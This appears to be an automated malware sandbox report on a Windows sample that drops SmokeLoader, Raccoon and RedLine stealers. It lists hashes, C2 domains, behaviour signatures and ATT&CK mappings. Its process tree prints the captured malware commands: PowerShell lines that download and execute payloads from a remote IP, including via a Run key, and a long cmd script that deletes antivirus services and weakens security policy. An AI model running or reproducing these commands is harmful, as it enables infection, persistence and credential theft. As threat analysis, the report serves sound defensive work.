Analysis

  • max time kernel
    150s
  • max time network
    192s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    11-08-2021 19:56

General

  • Target

    d4537efd24d9b886648bd32b6ce4da99.exe

  • Size

    207KB

  • MD5

    d4537efd24d9b886648bd32b6ce4da99

  • SHA1

    1a014d098b8ef7ecef5ec124ddef0030c42da509

  • SHA256

    5d372a19bbdae072e4fb4ff9deded30dbb40f4a74b54fbf77888a1523e864129

  • SHA512

    e0db39cd1165f6d34e33f4a31e71a1ff69f48cf3baf291cf873b91954e608b89dd8a89a4f1cafa279936cf22abf4e901290816d649bcbc143e7977618d6e30e4

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://91.241.19.52/Api/GetFile2

Extracted

Family

smokeloader

Version

2020

C2

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

http://readinglistforjuly6.site/

http://readinglistforjuly7.site/

http://readinglistforjuly8.site/

http://readinglistforjuly9.site/

http://readinglistforjuly10.site/

rc4.i32
rc4.i32

Extracted

Family

raccoon

Botnet

2ca2376c561d1af7f8b9e6f3256b06220a3db187

Attributes
  • url4cnc

    https://telete.in/johnyes13

rc4.plain
rc4.plain

Extracted

Family

raccoon

Botnet

471c70de3b4f9e4d493e418d1f60a90659057de0

Attributes
  • url4cnc

    https://telete.in/p1rosto100xx

rc4.plain
rc4.plain

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon Stealer Payload 4 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 14 IoCs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Loads dropped DLL 25 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 4 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d4537efd24d9b886648bd32b6ce4da99.exe
    "C:\Users\Admin\AppData\Local\Temp\d4537efd24d9b886648bd32b6ce4da99.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1644
    • C:\Users\Admin\AppData\Local\Temp\d4537efd24d9b886648bd32b6ce4da99.exe
      "C:\Users\Admin\AppData\Local\Temp\d4537efd24d9b886648bd32b6ce4da99.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:1240
  • C:\Users\Admin\AppData\Local\Temp\7ACB.exe
    C:\Users\Admin\AppData\Local\Temp\7ACB.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetWindowsHookEx
    PID:676
  • C:\Users\Admin\AppData\Local\Temp\8058.exe
    C:\Users\Admin\AppData\Local\Temp\8058.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:536
    • C:\Users\Admin\AppData\Local\Temp\is-C5V6R.tmp\8058.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-C5V6R.tmp\8058.tmp" /SL5="$5011A,4193427,831488,C:\Users\Admin\AppData\Local\Temp\8058.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:560
      • C:\Users\Admin\AppData\Local\Temp\8058.exe
        "C:\Users\Admin\AppData\Local\Temp\8058.exe" /VERYSILENT
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1340
        • C:\Users\Admin\AppData\Local\Temp\is-PQNBS.tmp\8058.tmp
          "C:\Users\Admin\AppData\Local\Temp\is-PQNBS.tmp\8058.tmp" /SL5="$70128,4193427,831488,C:\Users\Admin\AppData\Local\Temp\8058.exe" /VERYSILENT
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:1136
          • C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe
            "C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:1584
  • C:\Users\Admin\AppData\Local\Temp\86ED.exe
    C:\Users\Admin\AppData\Local\Temp\86ED.exe
    1⤵
    • Executes dropped EXE
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of AdjustPrivilegeToken
    PID:1056
  • C:\Users\Admin\AppData\Local\Temp\8C5B.exe
    C:\Users\Admin\AppData\Local\Temp\8C5B.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1348
    • C:\ProgramData\Runtimebroker.exe
      "C:\ProgramData\Runtimebroker.exe"
      2⤵
      • Executes dropped EXE
      • Drops startup file
      • Loads dropped DLL
      PID:1988
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91.241.19.52/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
        3⤵
        • Adds Run key to start application
        • Suspicious use of AdjustPrivilegeToken
        PID:676
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://91.241.19.52/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of AdjustPrivilegeToken
        PID:1144
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "powershell" Get-MpPreference -verbose
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1152
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )
          4⤵
            PID:1968
    • C:\Users\Admin\AppData\Local\Temp\9477.exe
      C:\Users\Admin\AppData\Local\Temp\9477.exe
      1⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Suspicious use of AdjustPrivilegeToken
      PID:2012
      • C:\Users\Admin\AppData\Local\Temp\9477.exe
        C:\Users\Admin\AppData\Local\Temp\9477.exe
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:1096
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\9477.exe"
          3⤵
            PID:1612
            • C:\Windows\SysWOW64\timeout.exe
              timeout /T 10 /NOBREAK
              4⤵
              • Delays execution with timeout.exe
              PID:1288
      • C:\Users\Admin\AppData\Local\Temp\A3D3.exe
        C:\Users\Admin\AppData\Local\Temp\A3D3.exe
        1⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Loads dropped DLL
        • Checks whether UAC is enabled
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Modifies system certificate store
        • Suspicious use of AdjustPrivilegeToken
        PID:1960
        • C:\Users\Admin\AppData\Local\Temp\cheat.exe
          "C:\Users\Admin\AppData\Local\Temp\cheat.exe"
          2⤵
          • Executes dropped EXE
          PID:1348
      • C:\Users\Admin\AppData\Local\Temp\A682.exe
        C:\Users\Admin\AppData\Local\Temp\A682.exe
        1⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Modifies system certificate store
        PID:1484
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\A682.exe"
          2⤵
            PID:1476
            • C:\Windows\SysWOW64\timeout.exe
              timeout /T 10 /NOBREAK
              3⤵
              • Delays execution with timeout.exe
              PID:920
        • C:\Windows\SysWOW64\explorer.exe
          C:\Windows\SysWOW64\explorer.exe
          1⤵
            PID:920
          • C:\Windows\explorer.exe
            C:\Windows\explorer.exe
            1⤵
              PID:1828
            • C:\Windows\SysWOW64\explorer.exe
              C:\Windows\SysWOW64\explorer.exe
              1⤵
                PID:1160
              • C:\Windows\explorer.exe
                C:\Windows\explorer.exe
                1⤵
                  PID:1940
                • C:\Windows\SysWOW64\explorer.exe
                  C:\Windows\SysWOW64\explorer.exe
                  1⤵
                    PID:1424
                  • C:\Windows\explorer.exe
                    C:\Windows\explorer.exe
                    1⤵
                      PID:932
                    • C:\Windows\SysWOW64\explorer.exe
                      C:\Windows\SysWOW64\explorer.exe
                      1⤵
                        PID:916
                      • C:\Windows\explorer.exe
                        C:\Windows\explorer.exe
                        1⤵
                          PID:1252
                        • C:\Windows\SysWOW64\explorer.exe
                          C:\Windows\SysWOW64\explorer.exe
                          1⤵
                            PID:472

                          Network

                          MITRE ATT&CK Matrix ATT&CK v6

                          Persistence

                          Modify Existing Service

                          1
                          T1031

                          Registry Run Keys / Startup Folder

                          1
                          T1060

                          Defense Evasion

                          Modify Registry

                          3
                          T1112

                          Disabling Security Tools

                          1
                          T1089

                          Virtualization/Sandbox Evasion

                          1
                          T1497

                          Install Root Certificate

                          1
                          T1130

                          Credential Access

                          Credentials in Files

                          3
                          T1081

                          Discovery

                          Query Registry

                          4
                          T1012

                          Virtualization/Sandbox Evasion

                          1
                          T1497

                          System Information Discovery

                          4
                          T1082

                          Peripheral Device Discovery

                          1
                          T1120

                          Collection

                          Data from Local System

                          3
                          T1005

                          Command and Control

                          Web Service

                          1
                          T1102

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\ProgramData\Runtimebroker.exe
                            MD5

                            62d1b104b14022206b559167d97f7007

                            SHA1

                            cec380a9e863382fc1e37796f2f644a0dc3e3dbc

                            SHA256

                            2917de6c13402e8ed00f0955929a5b131c1624f8261a077a135d08f01c1e71e5

                            SHA512

                            821392e15527f511fa8d0568f5befdbbd10858ec50f400c868d36c062103a8a77bc4188050f954ec560c9f99d275feff9daa484372b379f90ed0c9070944a5d7

                          • C:\ProgramData\Runtimebroker.exe
                            MD5

                            62d1b104b14022206b559167d97f7007

                            SHA1

                            cec380a9e863382fc1e37796f2f644a0dc3e3dbc

                            SHA256

                            2917de6c13402e8ed00f0955929a5b131c1624f8261a077a135d08f01c1e71e5

                            SHA512

                            821392e15527f511fa8d0568f5befdbbd10858ec50f400c868d36c062103a8a77bc4188050f954ec560c9f99d275feff9daa484372b379f90ed0c9070944a5d7

                          • C:\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\mozglue.dll
                            MD5

                            eae9273f8cdcf9321c6c37c244773139

